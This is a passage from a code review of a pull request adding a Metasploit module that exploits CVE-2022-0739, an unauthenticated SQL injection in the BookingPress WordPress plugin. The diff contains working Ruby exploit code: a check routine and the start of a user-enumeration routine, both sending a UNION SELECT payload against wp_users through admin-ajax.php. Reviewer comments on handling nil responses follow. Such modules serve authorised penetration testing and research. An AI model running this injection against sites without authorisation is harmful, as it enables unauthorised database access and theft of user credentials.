modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb

```diff
@@ -0,0 +1,148 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress BookingPress bookingpress_front_get_category_services SQLi',
+        'Description' => %q{
+          The BookingPress WordPress plugin before 1.0.11 fails to properly sanitize user supplied POST data before it is used in
+          a dynamically constructed SQL query via the bookingpress_front_get_category_services AJAX action (available to
+          unauthenticated users), leading to an unauthenticated SQL Injection.
+        },
+        'Author' => [
+          'cyllective', # discovery
+          'jheysel-r7' # module
+        ],
+        'References' => [
+          [ 'URL', 'https://github.com/destr4ct/CVE-2022-0739'],
+          [ 'WPVDB', '388cd42d-b61a-42a4-8604-99b812db2357'],
+          [ 'CVE', '2022-0739']
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2022-02-28',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('BOOKING_PRESS_PAGE', [ true, 'The webpage that bookingPress is running on', '/bookingpress/' ])
+    ])
+  end
+
+  def check
+    @nonce = get_user_nonce
+    return Exploit::CheckCode::Unknown if @nonce == 'Unable to get wp-nonce for an unauthenticated user'
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, '/wp-admin/admin-ajax.php'),
+      'vars_post' =>
+                                generate_vars_post(') UNION ALL SELECT @@VERSION,2,3,4,5,6,7,count(*),9 from wp_users-- -')
+    })
+
+    return Exploit::CheckCode::Vulnerable if res&.code == 200 && res.body.include?('bookingpress_service_position')
+
+    Exploit::CheckCode::Safe
+  end
+
+  def get_number_of_users
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, '/wp-admin/admin-ajax.php'),
+      'vars_post' =>
+                               generate_vars_post(') UNION ALL SELECT @@VERSION,2,3,4,5,6,7,count(*),9 from wp_users-- -')
+    })
+
+    number_of_users = JSON.parse(res&.body)[0]['bookingpress_service_position'].to_i
```

Comment:
The most common problem that may happen is is that `res` will be `nil` if there's a connection or timeout error. Would be worth checking for that case explicitly before moving on to parsing the body.

Could also use: `res.get_json_document` here.

Reply:
Partially fixed, I've raised another issue related to this which needs addressing and is in a similar vein r.e checking `res` response.

Reply:
Code in question has since been removed and updated code with logic checks has been added in place. Marking resolved.